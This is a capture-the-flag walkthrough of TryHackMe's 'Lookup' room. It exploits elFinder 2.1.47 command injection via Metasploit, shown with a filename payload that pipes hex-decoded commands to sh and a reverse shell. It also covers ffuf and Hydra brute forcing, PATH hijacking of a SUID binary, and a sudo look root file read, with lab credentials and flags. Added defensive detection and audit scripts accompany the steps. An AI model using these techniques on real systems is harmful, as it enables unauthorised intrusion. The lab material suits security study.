Lookup

A detailed walkthrough of exploiting a vulnerable elFinder installation to gain initial access, followed by privilege escalation through password discovery and SUID binary exploitation.

Web Exploitation
Privilege Escalation
Credential Harvesting
Linux Security
Challenge Overview

This walkthrough documents a penetration test of the "Lookup" challenge on TryHackMe. The assessment demonstrates a methodical approach to compromising a target system through web application vulnerabilities, credential brute forcing, and Linux privilege escalation techniques.

The target system hosts a vulnerable file manager application that can be exploited to gain initial access, followed by lateral movement to a user account and ultimately privilege escalation to root.

1. Initial Reconnaissance

Nmap Scan
Port scanning and service enumeration

We begin our reconnaissance with a comprehensive Nmap scan to identify open ports and services:

$ nmap -sS -Pn -p- -v -A 10.10.52.214

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://lookup.thm/

Open Ports

  • 22/TCP: SSH (OpenSSH 8.2p1)
  • 80/TCP: HTTP (Apache 2.4.41)

Web Application

  • Domain: lookup.thm
  • Pages: index.php, login.php
  • Subdomain: files.lookup.thm (discovered later)

After adding the domain to our /etc/hosts file, we explore the web application and discover:

  • A login page at login.php
  • The login form is vulnerable to username enumeration because it returns different error messages depending on whether the username exists
  • A "Wrong password" response (valid user) versus a "Wrong username or password" response (unknown user) lets us identify valid accounts

2. Credential Brute Forcing

Username & Password Discovery
Exploiting authentication vulnerabilities

Username Enumeration

Using ffuf to enumerate valid usernames by looking for the "Wrong password" response:

$ ffuf -request req -request-proto http -w /usr/share/seclists/Usernames/Names/names.txt -mr "Wrong password"

Valid usernames discovered:

admin
jose

Password Brute Forcing

Using ffuf to brute force passwords for the discovered usernames:

$ ffuf -request req -request-proto http -w usernames:FUZZ1 -w /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt:FUZZ2 -replay-proxy http://127.0.0.1:8080 -mc 302

Discovered Credentials:

password123

After successful login, we discover a subdomain: files.lookup.thm
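The ffuf runs above send one POST to login.php per wordlist entry, hundreds of them within seconds, which is a pattern the web server's own access log records even when the application itself does not. The following detection script is an added example, not part of the original walkthrough: it keeps a per-client sliding window over Apache combined-format log lines and flags any client that exceeds a threshold of login POSTs inside that window. The log lines, client addresses, timestamps and threshold values are constructed for the example; only the login path comes from the page.

```python
"""Flag login brute forcing and username enumeration in Apache access logs.

Added example; it is not part of the original walkthrough. A wordlist-driven
tool produces a burst of POSTs to the login endpoint from one client, so a
per-client sliding window over the access log catches both the username
enumeration and the password guessing. All log lines below are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOGIN_PATH = "/login.php"   # endpoint named on the page
THRESHOLD = 20              # login POSTs tolerated per window (assumed value)
WINDOW = 60                 # window length in seconds (assumed value)

# Apache "combined" format (assumed): ip ident user [time] "req" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return the fields needed from one access-log line, or None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "time": ts, "method": m.group("method"),
            "path": m.group("path").split("?", 1)[0], "status": int(m.group("status"))}


def find_brute_force(lines, threshold=THRESHOLD, window=WINDOW):
    """Map client IP -> peak number of login POSTs seen inside one window,
    for every client that exceeded the threshold. A slow trickle of genuine
    failed logins stays under the threshold; a wordlist burst does not."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent login POSTs
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != LOGIN_PATH:
            continue
        q = recent[rec["ip"]]
        q.append(rec["time"])
        # drop timestamps that fell out of the window ending at this request
        while (rec["time"] - q[0]).total_seconds() > window:
            q.popleft()
        if len(q) > threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged


def _log_line(ip, when, method="POST", path=LOGIN_PATH, status=200):
    """Build one constructed combined-format line."""
    stamp = when.strftime("%d/%b/%Y:%H:%M:%S +0000")
    return f'{ip} - - [{stamp}] "{method} {path} HTTP/1.1" {status} 1432 "-" "Mozilla/5.0"'


_T0 = datetime(2025, 4, 4, 19, 0, 0, tzinfo=timezone.utc)   # constructed start time
SAMPLE_LOG = (
    # a genuine user: one page load and three failed attempts spread over two minutes
    [_log_line("10.0.0.5", _T0, method="GET")]
    + [_log_line("10.0.0.5", _T0 + timedelta(seconds=s)) for s in (5, 40, 95)]
    # a wordlist run from another client: 25 POSTs, one per second
    + [_log_line("10.0.0.9", _T0 + timedelta(seconds=120 + i)) for i in range(25)]
    # a malformed line, to show the parser skips it rather than crashing
    + ["this line is not in combined format"]
)

if __name__ == "__main__":
    for ip, peak in find_brute_force(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {peak} login POSTs within {WINDOW}s")
```

The access log cannot tell a username-enumeration run from a password run (the POST bodies are not logged), but it does not need to: both exceed any sane per-client rate, and the flagged address can be handed to a ban mechanism. The window-based count is the rate limiting the recommendations section asks for, applied after the fact; pairing it with a single, identical error message for both failure cases removes the enumeration oracle entirely.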

3. Secondary Reconnaissance

elFinder Discovery
Exploring the file manager application

File Manager Interface

We discover an elFinder file manager at files.lookup.thm/elFinder/elfinder.html:

[Figure: elFinder file manager interface showing various text files]

The file manager reveals several directories:

  • /files
  • /img
  • /php
  • /sounds
  • /js
  • /css

Version Information

We discover version information for elFinder:

[Figure: elFinder version 2.1.47 information dialog]

Version Details:

  • Version: 2.1.47
  • Protocol version: 2.1047
  • jQuery/jQuery UI: 3.3.1/1.12.1

Vulnerability Research

A search for exploits reveals that this version of elFinder is vulnerable:

[Figure: Metasploit search results showing elFinder exploits]

Available Exploits:

  • exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection - PHP Connector exiftran Command Injection
  • exploit/linux/http/elfinder_archive_cmd_injection - Archive Command Injection

4. Initial Access

Exploitation
Leveraging the elFinder vulnerability

Using Metasploit, we exploit the vulnerable elFinder installation to gain a meterpreter session:

[Figure: successful Metasploit exploitation of the elFinder vulnerability]

msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run
[+] Started reverse TCP handler on 10.10.39.163:4444
[+] Uploading payload 'hT55418.jpg;echo 637020e2e2f6696c65732f85435354693982e6a7072a6563686f2a202e2e2 |xxd -r -p |sh #.jpg'
[+] Executing vulnerability via image rotation ...
[+] Sending stage (39927 bytes) to 10.10.52.214
[+] Deleted .8XxbAhTF.php
[+] Meterpreter session 1 opened (10.10.39.163:4444 → 10.10.52.214:58108)

Host Enumeration

With our initial foothold, we enumerate the system to find potential privilege escalation vectors:

User Discovery

We discover a user named think through /etc/passwd:

[Figure: output of cat /etc/passwd showing the think user]

SUID Binary Discovery

Listing SUID binaries reveals one entry that is not part of a stock installation, /usr/sbin/pwm:

$ find / -perm /4000 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/chsh
/usr/sbin/pwm

SUID Binary Analysis:

The /usr/sbin/pwm binary attempts to read a hidden .passwords file in the home directory of the executing user. It determines who that user is by running the id command without an absolute path, so whichever id is found first in PATH decides whose file gets read.

Path Hijacking

We can exploit the SUID binary by creating a fake id binary that reports us as think and prepending its directory to our PATH:

$ cat > /tmp/id << EOF
#!/bin/bash
echo "uid=33(think) gid=33(think) groups=33(think)"
EOF
$ chmod +x /tmp/id
$ export PATH=/tmp:$PATH
$ /usr/sbin/pwm

This reveals a list of potential passwords for the think user, including josemario.AKA(think).
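The two conditions that made this step work are auditable: a SUID binary that is not part of the distribution, and a PATH that contains a directory the unprivileged user can write to. The script below is an added example, not part of the original walkthrough. It compares a find listing (the one shown above) against a constructed baseline of the SUID binaries a stock install ships, and separately reports PATH entries an attacker could plant a fake helper in. The baseline set is an assumption for the example; on a real audit it would come from a known-good host or package manifests.

```python
"""Audit the SUID inventory and PATH for the privilege escalation surface above.

Added example, not part of the original walkthrough. Two checks:
  1. SUID binaries on the host that are not in a baseline of expected ones,
     so a custom binary such as /usr/sbin/pwm stands out;
  2. PATH entries an unprivileged user can write to, which is what a program
     that runs helpers like `id` by bare name implicitly trusts.
BASELINE_SUID is a constructed set; FIND_OUTPUT is the listing from the page.
"""
import os
import stat

# Constructed baseline: the SUID binaries the page's listing shares with a stock
# Ubuntu install. Replace with a manifest from a known-good host in practice.
BASELINE_SUID = {
    "/usr/bin/sudo", "/usr/bin/pkexec", "/usr/bin/chfn", "/usr/bin/newgrp",
    "/usr/bin/gpasswd", "/usr/bin/umount", "/usr/bin/passwd", "/usr/bin/mount",
    "/usr/bin/su", "/usr/bin/chsh",
}

# Output of `find / -perm /4000 2>/dev/null` as shown on the page.
FIND_OUTPUT = """\
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/chsh
/usr/sbin/pwm
"""


def parse_find_output(text):
    """Turn find's one-path-per-line output into a set of absolute paths."""
    return {line.strip() for line in text.splitlines() if line.strip().startswith("/")}


def unexpected_suid(found, baseline=BASELINE_SUID):
    """Return the SUID binaries that are not in the baseline, sorted."""
    return sorted(found - baseline)


def scan_suid(root="/"):
    """Live equivalent of the find command: walk the filesystem for SUID regular files."""
    found = set()
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found


def writable_path_entries(path_value, is_writable=None):
    """Return PATH entries the current user could drop a fake helper into.

    Empty entries and '.' resolve to the working directory, and relative
    entries depend on it too, so all of those are reported along with any
    absolute directory the caller's is_writable predicate accepts.
    """
    if is_writable is None:
        is_writable = lambda d: os.access(d, os.W_OK)
    risky = []
    for entry in path_value.split(":"):
        if entry in ("", "."):
            risky.append(entry or "(empty entry = cwd)")
        elif not entry.startswith("/") or is_writable(entry):
            risky.append(entry)
    return risky


if __name__ == "__main__":
    for path in unexpected_suid(parse_find_output(FIND_OUTPUT)):
        print(f"investigate non-baseline SUID binary: {path}")
    for entry in writable_path_entries(os.environ.get("PATH", "")):
        print(f"writable or relative PATH entry: {entry}")
```

Running the first check against the page's listing reports only /usr/sbin/pwm. The second check is the reason sudo's secure_path (visible in the sudo -l output later in this walkthrough) exists: a privileged program should invoke helpers by absolute path and ignore the PATH it inherits, because anything else lets the caller choose which id, which cat, or which sh actually runs.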

5. User Access

SSH Access
Gaining user-level access

Using the password list obtained earlier, we brute force SSH access to the think user:

[Figure: successful password discovery with Hydra]

$ hydra -l think -P passwords ssh://10.10.59.34
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-04 19:04:30
[DATA] max 16 tasks per 1 server, overall 16 tasks, 49 login tries (l:1/p:49), ~4 tries per
[DATA] attacking ssh://10.10.59.34:22/
[22][ssh] host: 10.10.59.34 login: think password: josemario.AKA(think)
1 of 1 target successfully completed, 1 valid password found

SSH Credentials:

think:josemario.AKA(think)

After logging in as think, we capture the user flag:

think@lookup:~$ cat user.txt
38375fb4dd8baa2b2039ac03d92b820e

6. Privilege Escalation

Root Access
Exploiting sudo privileges

We check for sudo privileges:

[Figure: sudo -l output showing that the think user can run the look binary]

think@lookup:~$ sudo -l
[sudo] password for think:
Matching Defaults entries for think on lookup:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User think may run the following commands on lookup:
    (ALL) /usr/bin/look

The think user can run the look binary with sudo privileges. According to GTFOBins, this can be exploited to read arbitrary files:

GTFOBins Technique:

From GTFOBins, we can use the following technique:

LFILE=file_to_read
sudo look '' "$LFILE"

Using this technique, we capture the root flag:

think@lookup:~$ sudo look '' /root/root.txt
5a285a9f257e45c68bb6c9f9f57d18e8
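The rule that granted this is a single line, and it is the kind of line an automated sudoers review catches. The script below is an added example, not part of the original walkthrough: it parses sudoers User_Spec lines, strips tags such as NOPASSWD:, and flags any rule granting ALL or granting, without fixed arguments, a binary that GTFOBins documents as able to read files or spawn a shell. The WATCHLIST is a constructed, deliberately short subset of GTFOBins entries, and the sudoers excerpt is constructed to mirror the sudo -l output above.

```python
"""Audit sudoers rules for commands that grant more than intended.

Added example, not from the original walkthrough. Parses lines of the form
    user host=(runas) [TAG:] command [args], command [args] ...
and reports rules granting ALL or an unrestricted GTFOBins-listed binary.
"""
import os
import re

# user, host, optional (runas) list, then the comma-separated command list
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAGS = ("NOPASSWD:", "PASSWD:", "SETENV:", "NOSETENV:", "EXEC:", "NOEXEC:")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")

# Constructed subset of binaries with GTFOBins sudo entries (file read or shell).
WATCHLIST = {"look", "cat", "less", "more", "vim", "find", "awk", "python3"}


def parse_rules(text):
    """Return one dict per granted command: user, runas, binary, args."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            stripped = True
            while stripped:                       # tags may stack: NOPASSWD: SETENV: ...
                stripped = False
                for tag in TAGS:
                    if cmd.startswith(tag):
                        cmd = cmd[len(tag):].strip()
                        stripped = True
            if not cmd:
                continue
            parts = cmd.split()
            rules.append({"user": m.group("user"), "runas": m.group("runas") or m.group("user"),
                          "binary": parts[0], "args": parts[1:]})
    return rules


def audit(text, watchlist=WATCHLIST):
    """Return (user, binary, reason) for every rule worth a second look."""
    findings = []
    for rule in parse_rules(text):
        if rule["binary"] == "ALL":
            findings.append((rule["user"], "ALL", "grants every command"))
            continue
        name = os.path.basename(rule["binary"])
        # a rule with fixed arguments only matches that exact argument list,
        # so only argument-less grants of a watchlisted binary are flagged
        if name in watchlist and not rule["args"]:
            findings.append((rule["user"], rule["binary"],
                             "GTFOBins binary with unrestricted arguments"))
    return findings


# Constructed excerpt; the think line mirrors the page's sudo -l output.
SAMPLE_SUDOERS = """\
Defaults        env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
think   ALL=(ALL) /usr/bin/look
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/ /backup/   # fixed args
"""

if __name__ == "__main__":
    for user, binary, reason in audit(SAMPLE_SUDOERS):
        print(f"{user}: {binary} -> {reason}")
```

The think rule is flagged because look takes the file to read as an argument and the rule leaves that argument open; root's ALL is reported for completeness. The backup rule passes because its arguments are pinned, which is the least-privilege shape the recommendations section asks for: if a user genuinely needs look, the rule should name the exact file, or a wrapper script should do the lookup against a fixed path so the user never controls which file the privileged process opens.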

Key Findings & Recommendations

Critical Vulnerabilities

  • Outdated Web Application

    elFinder version 2.1.47 is vulnerable to command injection.

  • Weak Authentication

    Login form vulnerable to username enumeration and brute force attacks.

  • Insecure SUID Binary

    Custom SUID binary vulnerable to PATH hijacking.

  • Excessive Sudo Privileges

    User allowed to run the look binary with sudo, enabling file read access.

Security Recommendations

  • Update Web Applications

    Keep all web applications updated to the latest secure versions.

  • Implement Secure Authentication

    Use consistent error messages and implement rate limiting for login attempts.

  • Review SUID Binaries

    Regularly audit SUID binaries and remove unnecessary privileges.

  • Restrict Sudo Access

    Follow the principle of least privilege when configuring sudo permissions.

Based on TryHackMe's "Lookup" room
